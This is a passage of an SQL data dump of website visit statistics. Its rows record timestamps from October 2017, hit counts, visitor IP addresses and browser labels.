8,1,1,0,0,'107.167.109.87','other'),(169602,1508759943,1,1,0,0,'91.196.178.70','chrome'),(169603,1508759977,1,1,0,0,'137.74.207.102','other'),(169604,1508760438,1,1,0,0,'51.255.65.64','other'),(169605,1508760523,1,1,0,0,'95.132.1.137','firefox'),(169606,1508760760,1,1,0,0,'178.92.249.66','chrome'),(169607,1508761251,1,1,0,0,'51.255.65.84','other'),(169608,1508761391,1,1,0,0,'51.255.65.34','other'),(169609,1508761413,1,1,0,0,'109.207.199.87','chrome'),(169610,1508761515,1,0,1,0,'66.249.64.28',''),(169611,1508761523,1,1,0,0,'95.132.1.137','firefox'),(169612,1508761562,1,1,0,0,'8.29.198.27','other'),(169613,1508761856,1,1,0,0,'198.37.118.38','firefox'),(169614,1508761900,1,1,0,0,'51.255.71.123','other'),(169615,1508762522,1,1,0,0,'164.132.162.154','other'),(169616,1508762962,1,1,0,0,'51.255.65.88','other'),(169617,1508763060,1,1,0,0,'91.196.178.70','chrome'),(169618,1508763158,1,1,0,0,'51.255.71.125','other'),(169619,1508763609,1,1,0,0,'51.255.71.114','other'),(169620,1508763682,1,1,0,0,'66.249.64.29','chrome'),(169621,1508763841,2,2,0,0,'37.73.204.29','other'),(169622,1508764177,1,1,0,0,'46.201.19.75','chrome'),(169623,1508764465,1,0,1,0,'66.249.64.28',''),(169624,1508764472,1,1,0,0,'141.8.142.74','other'),(169625,1508764835,2,0,2,0,'66.249.64.30',''),(169626,1508764872,1,1,0,0,'157.55.39.49','other'),(169627,1508764875,1,1,0,0,'62.122.182.106','chrome'),(169628,1508765215,2,2,0,0,'208.110.93.52','other'),(169629,1508765301,2,2,0,0,'217.69.133.5','other'),(169630,1508765745,1,1,0,0,'51.255.71.98','other'),(169631,1508766695,1,1,0,0,'51.255.65.95','other'),(169632,1508766924,1,1,0,0,'180.76.15.161','other'),(169633,1508766972,1,1,0,0,'51.255.65.64','other'),(169634,1508767148,1,1,0,0,'199.58.86.211','other'),(169635,1508767157,2,2,0,0,'178.154.171.88','other'),(169636,1508767535,1,1,0,0,'217.182.132.66','other'),(169637,1508768043,1,1,0,0,'217.69.133.226','other'),(169638,1508768498,1,1,0,0,'91.196.178.72','firefox'),(169639,1508768556,1,1,0,0,'164.132.162.155','other'),(169640,1508768964,1,1,0,0,'92.113.175.163','chrome'),(169641,1508769075,1,1,0,0,'164.132.162.158','other'),(169642,1508769091,1,1,0,0,'91.201.55.91','chrome'),(169643,1508769194,1,1,0,0,'51.255.71.128','other'),(169644,1508769392,1,1,0,0,'51.255.65.74','other'),(169645,1508769693,1,1,0,0,'157.55.39.49','other'),(169646,1508770436,1,1,0,0,'164.132.162.188','other'),(169647,1508770528,1,1,0,0,'51.255.65.29','other'),(169648,1508770582,1,1,0,0,'141.8.142.74','other'),(169649,1508770667,1,0,1,0,'66.249.64.28',''),(169650,1508770793,1,1,0,0,'91.196.178.167','chrome'),(169651,1508771583,1,1,0,0,'207.46.13.179','other'),(169652,1508771587,1,0,1,0,'66.249.70.25',''),(169653,1508771614,1,1,0,0,'66.249.70.25','chrome'),(169654,1508771636,1,1,0,0,'66.249.64.29','chrome'),(169655,1508771924,1,1,0,0,'91.196.178.167','chrome'),(169656,1508772185,1,1,0,0,'217.182.132.90','other'),(169657,1508772399,1,1,0,0,'8.29.198.25','other'),(169658,1508773932,1,1,0,0,'217.182.132.175','other'),(169659,1508774080,1,1,0,0,'51.255.65.18','other'),(169660,1508774217,1,1,0,0,'51.255.65.41','other'),(169661,1508774316,1,1,0,0,'163.172.255.19','chrome'),(169662,1508774375,1,1,0,0,'217.182.132.65','other'),(169663,1508774760,1,1,0,0,'217.182.132.7','other'),(169664,1508775002,1,1,0,0,'157.55.39.49','other'),(169665,1508775404,1,1,0,0,'51.255.65.47','other'),(169666,1508776439,1,1,0,0,'217.182.132.96','other'),(169667,1508777216,1,1,0,0,'217.182.132.69','other'),(169668,1508777236,1,0,1,0,'66.249.70.25',''),(169669,1508777592,1,1,0,0,'217.182.132.146','other'),(169670,1508778064,1,1,0,0,'164.132.164.180','other'),(169671,1508778253,1,1,0,0,'130.180.218.230','chrome'),(169672,1508778540,1,1,0,0,'217.182.132.96','other'),(169673,1508778717,1,1,0,0,'51.255.65.61','other'),(169674,1508779041,1,0,1,0,'66.249.64.30',''),(169675,1508779290,1,1,0,0,'91.196.178.163','chrome'),(169676,1508779670,1,1,0,0,'217.182.132.55','other'),(169677,1508780044,1,1,0,0,'141.8.142.74','other'),(169678,1508780249,2,2,0,0,'91.196.178.129','chrome'),(169679,1508780470,1,1,0,0,'51.255.65.84','other'),(169680,1508780512,1,1,0,0,'89.163.131.165','chrome'),(169681,1508780706,1,1,0,0,'137.74.207.109','other'),(169682,1508781655,1,1,0,0,'217.182.132.174','other'),(169683,1508782642,1,1,0,0,'51.255.65.94','other'),(169684,1508783248,1,1,0,0,'8.29.198.26','other'),(169685,1508783492,1,1,0,0,'217.69.133.6','other'),(169686,1508783537,1,1,0,0,'157.55.39.187','other'),(169687,1508783618,1,1,0,0,'216.244.66.237','other'),(169688,1508783774,1,1,0,0,'164.132.162.160','other'),(169689,1508783993,3,3,0,0,'176.113.170.104','chrome'),(169690,1508784159,1,0,1,0,'66.249.70.27',''),(169691,1508784474,1,1,0,0,'51.255.65.42','other'),(169692,1508785270,1,1,0,0,'51.255.65.39','other'),(169693,1508785405,1,1,0,0,'217.182.132.27','other'),(169694,1508785560,1,0,1,0,'66.249.64.30',''),(169695,1508785922,1,1,0,0,'51.255.71.132','other'),(169696,1508786549,1,1,0,0,'91.196.178.162','chrome'),(169697,1508787197,1,1,0,0,'217.182.132.96','other'),(169698,1508787708,1,1,0,0,'51.255.65.39','other'),(169699,1508788459,1,1,0,0,'89.163.131.165','chrome'),(169700,1508789191,1,0,1,0,'66.249.64.28',''),(169701,1508789739,1,1,0,0,'66.249.64.28','chrome'),(169702,1508789777,1,0,1,0,'66.249.70.27',''),(169703,1508789779,1,1,0,0,'66.249.70.29','chrome'),(169704,1508789859,1,1,0,0,'51.255.65.83','other'),(169705,1508790699,1,1,0,0,'51.255.65.25','other'),(169706,1508790716,1,1,0,0,'217.182.132.76','other'),(169707,1508790965,1,1,0,0,'51.255.71.115','other'),(169708,1508791146,1,1,0,0,'137.74.201.108','other'),(169709,1508791572,1,0,1,0,'66.249.69.35',''),(169710,1508791817,1,1,0,0,'217.182.132.53','other'),(169711,1508792175,1,1,0,0,'217.182.132.181','other'),(169712,1508792522,1,1,0,0,'217.182.132.70','other'),(169713,1508793806,1,1,0,0,'217.182.132.149','other'),(169714,1508794090,1,1,0,0,'8.29.198.25','other'),(169715,1508794097,1,1,0,0,'157.55.39.49','other'),(169716,1508794260,1,1,0,0,'163.172.255.19','chrome'),(169717,1508794323,1,1,0,0,'51.255.65.72','other'),(169718,1508794399,1,1,0,0,'217.69.133.4','other'),(169719,1508796425,1,0,1,0,'66.249.69.39',''),(169720,1508796522,1,1,0,0,'217.69.133.218','other'),(169721,1508796706,1,1,0,0,'51.255.71.133','other'),(169722,1508797036,1,1,0,0,'157.55.39.49','other'),(169723,1508797688,1,1,0,0,'157.55.39.187','other'),(169724,1508797931,1,0,1,0,'66.249.69.35',''),(169725,1508797986,1,1,0,0,'217.182.132.22','other'),(169726,1508798327,1,1,0,0,'51.255.65.16','other'),(169727,1508798378,1,1,0,0,'51.255.65.67','other'),(169728,1508798561,1,1,0,0,'51.255.65.95','other'),(169729,1508798708,1,1,0,0,'217.182.132.68','other'),(169730,1508798759,1,0,1,0,'66.249.69.158',''),(169731,1508798970,1,1,0,0,'51.255.71.114','other'),(169732,1508799294,1,1,0,0,'217.182.132.182','other'),(169733,1508799343,1,1,0,0,'89.163.131.165','chrome'),(169734,1508800478,1,1,0,0,'51.255.65.10','other'),(169735,1508800543,1,1,0,0,'157.55.39.49','other'),(169736,1508800666,1,1,0,0,'216.244.66.237','other'),(169737,1508801804,1,1,0,0,'66.249.69.39','chrome'),(169738,1508801811,2,1,1,0,'66.249.69.156',''),(169739,1508802215,1,1,0,0,'51.255.65.59','other'),(169740,1508802324,1,1,0,0,'137.74.207.119','other'),(169741,1508802698,1,1,0,0,'157.55.39.157','other'),(169742,1508803443,1,1,0,0,'217.182.132.95','other'),(169743,1508803572,1,1,0,0,'51.255.65.22','other'),(169744,1508804517,1,1,0,0,'51.255.65.96','other'),(169745,1508804818,1,1,0,0,'217.182.132.97','other'),(169746,1508804932,1,1,0,0,'8.29.198.26','other'),(169747,1508805017,1,1,0,0,'51.255.71.98','other'),(169748,1508805074,1,1,0,0,'157.55.39.157','other'),(169749,1508805288,1,1,0,0,'217.69.133.4','other'),(169750,1508805353,1,1,0,0,'51.255.65.35','other'),(169751,1508805538,1,1,0,0,'51.255.65.29','other'),(169752,1508806066,1,1,0,0,'217.69.133.221','other'),(169753,1508806137,1,1,0,0,'209.90.225.218','chrome'),(169754,1508806768,1,1,0,0,'51.255.71.123','other'),(169755,1508807105,1,1,0,0,'137.74.207.170','other'),(169756,1508808058,1,1,0,0,'51.255.64.106','other'),(169757,1508808508,1,1,0,0,'217.182.132.153','other'),(169758,1508808582,1,0,1,0,'66.249.69.39',''),(169759,1508808817,1,1,0,0,'137.74.201.100','other'),(169760,1508808928,1,1,0,0,'217.182.132.150','other'),(169761,1508809184,1,1,0,0,'217.182.132.71','other'),(169762,1508809221,1,1,0,0,'178.154.171.4','other'),(169763,1508809635,1,1,0,0,'66.249.69.156','chrome'),(169764,1508810541,1,1,0,0,'217.182.132.69','other'),(169765,1508811269,1,1,0,0,'51.255.65.74','other'),(169766,1508811305,1,1,0,0,'164.132.162.188','other'),(169767,1508811552,1,1,0,0,'199.30.24.233','other'),(169768,1508811643,1,1,0,0,'217.182.132.50','other'),(169769,1508812718,1,1,0,0,'62.122.182.106','firefox'),(169770,1508813978,1,1,0,0,'87.250.224.85','other'),(169771,1508814443,1,1,0,0,'217.182.132.34','other'),(169772,1508815051,2,1,1,0,'66.249.69.41',''),(169773,1508815285,1,1,0,0,'89.163.131.165','firefox'),(169774,1508815777,1,1,0,0,'8.29.198.26','other'),(169775,1508815850,1,1,0,0,'51.255.65.64','other'),(169776,1508816250,1,1,0,0,'217.182.132.86','other'),(169777,1508816891,1,1,0,0,'195.238.108.89','chrome'),(169778,1508817278,1,1,0,0,'141.8.142.126','other'),(169779,1508817382,1,1,0,0,'217.182.132.7','other'),(169780,1508817445,1,1,0,0,'217.69.133.68','other'),(169781,1508818279,1,0,1,0,'66.249.69.157',''),(169782,1508818360,1,1,0,0,'66.249.69.156','chrome'),(169783,1508818854,1,1,0,0,'87.250.224.85','other'),(169784,1508819592,1,1,0,0,'217.182.132.59','other'),(169785,1508819632,1,1,0,0,'51.255.71.120','other'),(169786,1508819973,1,1,0,0,'66.249.69.41','chrome'),(169787,1508820154,1,1,0,0,'157.55.39.157','other'),(169788,1508820439,1,1,0,0,'217.69.133.237','other'),(169789,1508820520,1,1,0,0,'199.30.24.231','other'),(169790,1508820658,1,1,0,0,'217.69.133.244','other'),(169791,1508821757,1,1,0,0,'217.182.132.186','other'),(169792,1508821785,1,1,0,0,'51.255.65.69','other'),(169793,1508822164,1,1,0,0,'51.255.65.92','other'),(169794,1508822273,1,1,0,0,'137.74.207.102','other'),(169795,1508822483,1,1,0,0,'51.255.65.78','other'),(169796,1508824015,1,1,0,0,'217.182.132.24','other'),(169797,1508824291,2,2,0,0,'91.196.178.70','chrome'),(169798,1508824859,1,1,0,0,'66.249.69.157','chrome'),(169799,1508825124,1,1,0,0,'157.55.39.187','other'),(169800,1508825186,1,1,0,0,'89.163.131.165','chrome'),(169801,1508825194,4,4,0,0,'54.165.59.7','other'),(169802,1508825385,1,1,0,0,'164.132.162.160','other'),(169803,1508825446,1,1,0,0,'178.154.171.56','other'),(169804,1508826007,1,1,0,0,'66.249.69.39','chrome'),(169805,1508826415,1,1,0,0,'92.113.175.163','chrome'),(169806,1508826420,1,1,0,0,'92.112.105.232','opera'),(169807,1508826621,1,1,0,0,'8.29.198.25','other'),(169808,1508826730,1,1,0,0,'198.37.118.38','firefox'),(169809,1508826891,1,0,1,0,'66.249.69.35',''),(169810,1508826988,1,1,0,0,'51.255.65.39','other'),(169811,1508827086,1,1,0,0,'217.182.132.187','other'),(169812,1508827150,1,1,0,0,'217.182.132.23','other'),(169813,1508827409,3,3,0,0,'54.165.59.7','other'),(169814,1508827463,1,1,0,0,'51.255.65.92','other'),(169815,1508827504,1,1,0,0,'51.255.65.91','other'),(169816,1508827631,1,1,0,0,'180.76.15.141','other'),(169817,1508827945,1,0,1,0,'66.249.69.158',''),(169818,1508827969,1,1,0,0,'51.255.65.28','other'),(169819,1508827998,1,1,0,0,'51.255.64.106','other'),(169820,1508828039,1,1,0,0,'51.255.65.63','other'),(169821,1508828245,1,1,0,0,'51.255.71.98','other'),(169822,1508828558,1,0,1,0,'66.249.69.35',''),(169823,1508829308,1,1,0,0,'37.9.113.157','other'),(169824,1508829614,1,1,0,0,'37.9.113.132','other'),(169825,1508829647,1,1,0,0,'178.95.195.7','firefox'),(169826,1508829736,1,1,0,0,'87.250.224.46','other'),(169827,1508829738,1,0,1,0,'66.249.69.35',''),(169828,1508829958,1,1,0,0,'217.182.132.177','other'),(169829,1508829992,1,1,0,0,'217.182.132.35','other'),(169830,1508830059,1,1,0,0,'217.182.132.18','other'),(169831,1508830667,1,1,0,0,'157.55.39.157','other'),(169832,1508830801,1,1,0,0,'178.154.171.10','other'),(169833,1508830890,1,0,1,0,'66.249.69.156',''),(169834,1508831026,1,1,0,0,'66.249.69.156','chrome'),(169835,1508831049,1,1,0,0,'66.249.69.35','chrome'),(169836,1508831223,1,1,0,0,'212.1.108.82','opera'),(169837,1508831228,1,1,0,0,'141.8.142.29','other'),(169838,1508831268,1,1,0,0,'37.9.113.101','other'),(169839,1508831737,1,1,0,0,'217.182.132.88','other'),(169840,1508831752,1,1,0,0,'91.210.250.222','chrome'),(169841,1508831759,1,1,0,0,'51.255.65.21','other'),(169842,1508831909,1,1,0,0,'91.196.178.71','chrome'),(169843,1508831955,1,1,0,0,'217.182.132.81','other'),(169844,1508832073,1,1,0,0,'51.255.65.94','other'),(169845,1508832297,1,1,0,0,'37.9.113.182','other'),(169846,1508832456,1,1,0,0,'51.255.65.65','other'),(169847,1508832726,1,1,0,0,'51.255.65.73','other'),(169848,1508832979,1,1,0,0,'217.182.132.146','other'),(169849,1508833049,1,1,0,0,'217.182.132.53','other'),(169850,1508833123,1,1,0,0,'178.154.171.55','other'),(169851,1508833148,1,1,0,0,'37.9.113.115','other'),(169852,1508833151,1,1,0,0,'37.9.113.56','other'),(169853,1508833313,1,1,0,0,'137.74.207.101','other'),(169854,1508833392,1,1,0,0,'37.9.113.182','other'),(169855,1508833399,1,1,0,0,'130.180.219.211','firefox'),(169856,1508833410,1,1,0,0,'217.182.132.60','other'),(169857,1508833524,1,1,0,0,'51.255.71.133','other'),(169858,1508834127,1,1,0,0,'213.160.129.78','firefox'),(169859,1508834214,1,1,0,0,'213.180.203.7','other'),(169860,1508834266,1,1,0,0,'91.196.178.71','firefox'),(169861,1508834277,1,1,0,0,'141.8.142.126','other'),(169862,1508834293,1,1,0,0,'217.182.132.156','other'),(169863,1508834317,1,1,0,0,'217.182.132.173','other'),(169864,1508834649,1,1,0,0,'213.180.203.40','other'),(169865,1508834725,1,1,0,0,'217.182.132.16','other'),(169866,1508834976,1,1,0,0,'178.154.200.7','other'),(169867,1508835125,1,1,0,0,'51.255.65.11','other'),(169868,1508835135,1,1,0,0,'51.255.65.49','other'),(169869,1508835245,1,1,0,0,'178.154.200.28','other'),(169870,1508835308,1,1,0,0,'217.182.132.18','other'),(169871,1508835457,1,1,0,0,'51.255.65.15','other'),(169872,1508835739,1,1,0,0,'217.182.132.57','other'),(169873,1508835799,1,1,0,0,'51.255.71.129','other'),(169874,1508835826,2,2,0,0,'178.154.171.10','other'),(169875,1508836217,1,1,0,0,'157.55.39.187','other'),(169876,1508836464,1,1,0,0,'66.249.69.158','chrome'),(169877,1508836473,1,1,0,0,'157.55.39.157','other'),(169878,1508836481,1,1,0,0,'66.249.69.39','chrome'),(169879,1508836545,1,1,0,0,'46.211.5.68','chrome'),(169880,1508836712,1,1,0,0,'91.196.179.138','chrome'),(169881,1508837011,1,1,0,0,'217.182.132.96','other'),(169882,1508837045,1,1,0,0,'51.255.65.46','other'),(169883,1508837220,1,1,0,0,'91.196.177.46','chrome'),(169884,1508837289,1,1,0,0,'87.250.224.46','other'),(169885,1508837303,1,1,0,0,'217.182.132.30','other'),(169886,1508837397,1,1,0,0,'51.255.65.78','other'),(169887,1508837451,1,1,0,0,'178.154.171.10','other'),(169888,1508837459,1,1,0,0,'8.29.198.25','other'),(169889,1508837473,1,1,0,0,'217.182.132.192','other'),(169890,1508837814,1,1,0,0,'213.180.203.40','other'),(169891,1508837943,1,1,0,0,'91.196.178.71','firefox'),(169892,1508838145,16,16,0,0,'154.16.138.15','other'),(169893,1508838174,1,1,0,0,'141.8.142.74','other'),(169894,1508838214,1,1,0,0,'66.249.69.158','chrome'),(169895,1508838333,1,1,0,0,'217.182.132.96','other'),(169896,1508838453,1,1,0,0,'137.74.201.100','other'),(169897,1508838616,1,1,0,0,'217.182.132.19','other'),(169898,1508839281,1,1,0,0,'91.201.55.91','chrome'),(169899,1508839320,1,1,0,0,'77.222.134.100','firefox'),(169900,1508839399,1,1,0,0,'66.102.9.38','chrome'),(169901,1508839401,1,1,0,0,'66.249.87.8','chrome'),(169902,1508839402,1,1,0,0,'66.249.87.6','chrome'),(169903,1508839406,1,1,0,0,'66.102.6.168','other'),(169904,1508839419,1,1,0,0,'66.249.88.67','chrome'),(169905,1508839542,1,1,0,0,'51.255.65.56','other'),(169906,1508839626,1,1,0,0,'217.69.133.230','other'),(169907,1508839639,1,1,0,0,'51.255.71.125','other'),(169908,1508839822,1,1,0,0,'137.74.207.114','other'),(169909,1508840133,1,1,0,0,'217.182.132.182','other'),(169910,1508840238,1,1,0,0,'141.8.142.74','other'),(169911,1508840952,1,1,0,0,'91.196.178.161','chrome'),(169912,1508841045,1,1,0,0,'51.255.65.3','other'),(169913,1508841621,1,1,0,0,'51.255.65.16','other'),(169914,1508841940,1,1,0,0,'130.180.216.138','chrome'),(169915,1508841961,1,1,0,0,'178.92.177.27','chrome'),(169916,1508842204,1,1,0,0,'217.182.132.77','other'),(169917,1508842479,1,0,1,0,'66.249.69.39',''),(169918,1508842664,1,1,0,0,'130.180.217.48','chrome'),(169919,1508842814,1,1,0,0,'157.55.39.157','other'),(169920,1508842871,3,3,0,0,'141.8.142.74','other'),(169921,1508843010,1,1,0,0,'51.255.65.39','other'),(169922,1508843295,1,1,0,0,'51.255.65.3','other'),(169923,1508843405,1,1,0,0,'91.196.178.167','chrome'),(169924,1508843581,1,1,0,0,'66.249.69.156','chrome'),(169925,1508843586,1,1,0,0,'66.249.69.39','chrome'),(169926,1508843848,1,1,0,0,'91.196.178.71','chrome'),(169927,1508844023,1,1,0,0,'151.80.27.116','other'),(169928,1508844163,1,1,0,0,'176.31.231.10','other'),(169929,1508844169,1,1,0,0,'66.249.69.158','chrome'),(169930,1508844188,1,1,0,0,'217.69.133.220','other'),(169931,1508844257,1,1,0,0,'51.255.65.88','other'),(169932,1508844508,1,1,0,0,'217.182.132.60','other'),(169933,1508844509,1,1,0,0,'141.8.142.74','other'),(169934,1508845181,2,2,0,0,'144.76.8.66','other'),(169935,1508845414,2,0,2,0,'66.249.69.158',''),(169936,1508845435,1,1,0,0,'217.182.132.78','other'),(169937,1508845942,1,1,0,0,'92.113.188.48','firefox'),(169938,1508846438,1,1,0,0,'141.8.142.74','other'),(169939,1508846461,1,1,0,0,'51.255.71.113','other'),(169940,1508846920,1,1,0,0,'217.69.136.210','other'),(169941,1508847106,2,2,0,0,'91.196.178.71','firefox'),(169942,1508847565,1,1,0,0,'164.132.162.153','other'),(169943,1508847675,1,1,0,0,'217.182.132.241','other'),(169944,1508847769,1,1,0,0,'51.255.65.71','other'),(169945,1508847772,1,1,0,0,'217.69.133.241','other'),(169946,1508847788,1,1,0,0,'51.255.71.111','other'),(169947,1508848067,1,1,0,0,'164.132.162.158','other'),(169948,1508848328,1,1,0,0,'8.29.198.25','other'),(169949,1508848424,1,1,0,0,'51.255.65.27','other'),(169950,1508848519,2,0,2,0,'66.249.69.39',''),(169951,1508848716,1,1,0,0,'217.182.132.172','other'),(169952,1508848788,1,1,0,0,'137.74.207.120','other'),(169953,1508848870,1,1,0,0,'66.249.69.158','chrome'),(169954,1508848876,1,1,0,0,'66.249.69.41','chrome'),(169955,1508848989,1,1,0,0,'51.255.65.61','other'),(169956,1508849599,1,1,0,0,'137.74.207.114','other'),(169957,1508849913,1,0,1,0,'66.249.69.156',''),(169958,1508849916,1,1,0,0,'91.196.178.70','chrome'),(169959,1508850599,1,1,0,0,'141.8.142.74','other'),(169960,1508850818,1,1,0,0,'51.255.71.112','other'),(169961,1508850886,1,1,0,0,'91.196.178.165','chrome'),(169962,1508850888,71,71,0,0,'23.237.4.26','other'),(169963,1508851122,1,0,1,0,'66.249.69.156',''),(169964,1508851253,1,1,0,0,'91.196.178.70','chrome'),(169965,1508852074,1,1,0,0,'217.69.136.206','other'),(169966,1508852122,1,1,0,0,'91.213.149.95','chrome'),(169967,1508852389,1,1,0,0,'137.74.207.116','other'),(169968,1508852655,1,1,0,0,'51.255.71.101','other'),(169969,1508852808,1,1,0,0,'217.182.132.77','other'),(169970,1508853068,1,1,0,0,'91.196.177.46','chrome'),(169971,1508853373,1,1,0,0,'178.154.171.88','other'),(169972,1508853413,1,1,0,0,'199.30.25.235','other'),(169973,1508853474,1,1,0,0,'51.255.65.55','other'),(169974,1508853508,2,0,2,0,'66.249.69.35',''),(169975,1508853732,2,0,2,0,'66.249.69.158',''),(169976,1508854131,1,1,0,0,'91.196.177.15','chrome'),(169977,1508854408,1,1,0,0,'51.255.65.40','other'),(169978,1508854727,1,1,0,0,'66.249.69.158','chrome'),(169979,1508854732,1,1,0,0,'66.249.69.41','chrome'),(169980,1508855120,1,1,0,0,'180.76.15.143','other'),(169981,1508855309,1,1,0,0,'217.182.132.30','other'),(169982,1508855887,1,1,0,0,'157.55.39.157','other'),(169983,1508855984,1,1,0,0,'130.180.209.32','firefox'),(169984,1508856516,1,1,0,0,'51.255.65.30','other'),(169985,1508856728,1,1,0,0,'51.255.71.116','other'),(169986,1508857120,1,1,0,0,'180.76.15.143','other'),(169987,1508857699,1,1,0,0,'162.210.196.130','other'),(169988,1508858816,1,1,0,0,'51.255.71.128','other'),(169989,1508859004,5,5,0,0,'144.76.8.231','other'),(169990,1508859165,1,1,0,0,'8.29.198.26','other'),(169991,1508859384,1,1,0,0,'178.92.153.83','opera'),(169992,1508859635,1,1,0,0,'66.249.69.158','chrome'),(169993,1508859641,1,1,0,0,'66.249.69.35','chrome'),(169994,1508860003,1,1,0,0,'51.255.65.39','other'),(169995,1508860523,1,1,0,0,'51.255.65.48','other'),(169996,1508860698,1,1,0,0,'180.76.15.139','other'),(169997,1508860875,1,1,0,0,'94.254.241.78','chrome'),(169998,1508861051,1,1,0,0,'141.8.142.74','other'),(169999,1508861733,1,1,0,0,'199.30.25.56','other'),(170000,1508861750,1,1,0,0,'51.255.65.26','other'),(170001,1508861923,1,1,0,0,'188.190.0.162','chrome'),(170002,1508861947,1,1,0,0,'217.182.132.77','other'),(170003,1508862488,1,1,0,0,'217.182.132.156','other'),(170004,1508862566,1,1,0,0,'141.8.142.74','other'),(170005,1508862658,1,1,0,0,'137.74.207.120','other'),(170006,1508862729,1,1,0,0,'217.182.132.85','other'),(170007,1508863188,1,1,0,0,'51.255.65.25','other'),(170008,1508863576,1,1,0,0,'178.154.171.88','other'),(170009,1508863577,1,1,0,0,'141.8.142.74','other'),(170010,1508863634,1,1,0,0,'51.255.65.4','other'),(170011,1508863950,1,1,0,0,'91.196.178.69','firefox'),(170012,1508864119,1,1,0,0,'217.69.136.203','other'),(170013,1508864811,2,0,2,0,'66.249.69.39',''),(170014,1508864915,1,0,1,0,'66.249.69.157',''),(170015,1508865065,1,1,0,0,'66.249.69.158','chrome'),(170016,1508865073,1,1,0,0,'66.249.69.41','chrome'),(170017,1508865300,1,1,0,0,'51.255.65.4','other'),(170018,1508865461,1,0,1,0,'66.249.69.35',''),(170019,1508865904,1,1,0,0,'141.8.142.74','other'),(170020,1508865949,1,1,0,0,'51.255.71.98','other'),(170021,1508866434,1,1,0,0,'217.182.132.172','other'),(170022,1508867155,1,1,0,0,'151.80.27.118','other'),(170023,1508867299,1,1,0,0,'51.255.65.4','other'),(170024,1508867389,1,1,0,0,'51.255.65.2','other'),(170025,1508867532,1,1,0,0,'217.69.133.192','other'),(170026,1508867739,1,1,0,0,'217.69.133.229','other'),(170027,1508867783,1,1,0,0,'217.182.132.157','other'),(170028,1508869022,1,1,0,0,'157.55.39.49','other'),(170029,1508869140,1,0,1,0,'66.249.69.39',''),(170030,1508869669,1,1,0,0,'164.132.162.154','other'),(170031,1508870010,1,1,0,0,'8.29.198.26','other'),(170032,1508870376,1,1,0,0,'178.154.171.88','other'),(170033,1508870525,1,1,0,0,'74.115.214.156','other'),(170034,1508870631,1,0,1,0,'66.249.69.158',''),(170035,1508870653,1,1,0,0,'66.249.69.157','chrome'),(170036,1508871265,1,1,0,0,'217.182.132.37','other'),(170037,1508871557,1,1,0,0,'188.255.50.81','msie'),(170038,1508871609,1,1,0,0,'141.8.142.74','other'),(170039,1508871817,1,1,0,0,'51.255.65.33','other'),(170040,1508871890,1,1,0,0,'217.182.132.19','other'),(170041,1508872331,1,1,0,0,'66.249.69.41','chrome'),(170042,1508872395,1,1,0,0,'51.255.65.45','other'),(170043,1508872772,1,1,0,0,'5.16.99.142','msie'),(170044,1508873119,1,1,0,0,'91.196.178.163','chrome'),(170045,1508873647,1,1,0,0,'95.220.99.134','msie'),(170046,1508873950,1,1,0,0,'109.63.179.251','msie'),(170047,1508874235,1,1,0,0,'141.8.142.74','other'),(170048,1508874440,1,1,0,0,'51.255.71.100','other'),(170049,1508874593,1,0,1,0,'66.249.69.157',''),(170050,1508874605,1,1,0,0,'54.165.59.7','other'),(170051,1508874887,1,1,0,0,'91.196.178.167','chrome'),(170052,1508874982,1,1,0,0,'51.255.65.88','other'),(170053,1508875677,1,1,0,0,'66.249.69.157','chrome'),(170054,1508876213,1,1,0,0,'66.249.69.156','chrome'),(170055,1508876255,1,1,0,0,'91.201.55.91','chrome'),(170056,1508876530,1,1,0,0,'217.182.132.5','other'),(170057,1508876601,1,1,0,0,'51.255.65.27','other'),(170058,1508876753,3,3,0,0,'178.154.171.88','other'),(170059,1508876763,1,1,0,0,'51.255.71.120','other'),(170060,1508876827,1,0,1,0,'66.249.69.41',''),(170061,1508877389,1,1,0,0,'51.255.65.69','other'),(170062,1508877751,1,1,0,0,'66.249.69.41','chrome'),(170063,1508877790,1,1,0,0,'91.196.178.168','chrome'),(170064,1508878039,1,0,1,0,'66.249.69.39',''),(170065,1508878179,1,1,0,0,'51.255.65.95','other'),(170066,1508879221,1,1,0,0,'137.74.207.120','other'),(170067,1508879239,1,1,0,0,'180.76.15.26','other'),(170068,1508879462,1,1,0,0,'217.182.132.185','other'),(170069,1508879511,1,1,0,0,'157.55.39.157','other'),(170070,1508879698,1,1,0,0,'188.255.50.81','msie'),(170071,1508880194,1,1,0,0,'198.37.118.38','firefox'),(170072,1508880411,1,1,0,0,'51.255.65.58','other'),(170073,1508880420,1,1,0,0,'95.24.93.85','msie'),(170074,1508880806,1,1,0,0,'51.255.65.92','other'),(170075,1508880853,1,1,0,0,'8.29.198.27','other'),(170076,1508881386,1,1,0,0,'164.132.164.180','other'),(170077,1508881387,1,1,0,0,'95.220.99.134','msie'),(170078,1508881388,1,1,0,0,'217.182.132.185','other'),(170079,1508881579,1,1,0,0,'109.63.187.114','msie'),(170080,1508881689,1,1,0,0,'66.249.69.156','chrome'),(170081,1508881765,1,1,0,0,'217.182.132.180','other'),(170082,1508882107,1,1,0,0,'141.8.142.74','other'),(170083,1508882169,1,1,0,0,'217.182.132.177','other'),(170084,1508882939,1,1,0,0,'217.182.132.180','other'),(170085,1508883892,2,2,0,0,'141.8.142.74','other'),(170086,1508885133,1,1,0,0,'51.255.65.5','other'),(170087,1508885328,1,1,0,0,'217.182.132.76','other'),(170088,1508885450,1,1,0,0,'141.8.142.74','other'),(170089,1508885755,1,1,0,0,'137.74.201.108','other'),(170090,1508885874,1,1,0,0,'217.182.132.27','other'),(170091,1508885946,1,1,0,0,'217.182.132.241','other'),(170092,1508886326,1,1,0,0,'217.182.132.20','other'),(170093,1508886585,1,1,0,0,'66.249.69.39','chrome'),(170094,1508886992,1,1,0,0,'51.255.65.60','other'),(170095,1508887879,1,1,0,0,'217.69.133.247','other'),(170096,1508888312,1,1,0,0,'217.182.132.70','other'),(170097,1508888314,1,1,0,0,'95.220.108.203','msie'),(170098,1508888382,1,1,0,0,'188.255.50.81','msie'),(170099,1508888423,1,1,0,0,'141.8.142.74','other'),(170100,1508888449,1,1,0,0,'141.8.132.19','other'),(170101,1508889058,1,1,0,0,'5.166.136.24','msie'),(170102,1508889178,1,1,0,0,'178.154.171.88','other'),(170103,1508889457,1,1,0,0,'51.255.71.128','other'),(170104,1508890313,1,1,0,0,'37.147.111.89','msie'),(170105,1508890499,1,1,0,0,'109.63.187.114','msie'),(170106,1508890659,1,1,0,0,'178.154.171.88','other'),(170107,1508891020,1,1,0,0,'217.182.132.67','other'),(170108,1508891056,1,1,0,0,'217.182.132.34','other'),(170109,1508891079,1,1,0,0,'51.255.65.97','other'),(170110,1508891260,1,1,0,0,'217.182.132.83','other'),(170111,1508891697,1,1,0,0,'8.29.198.27','other'),(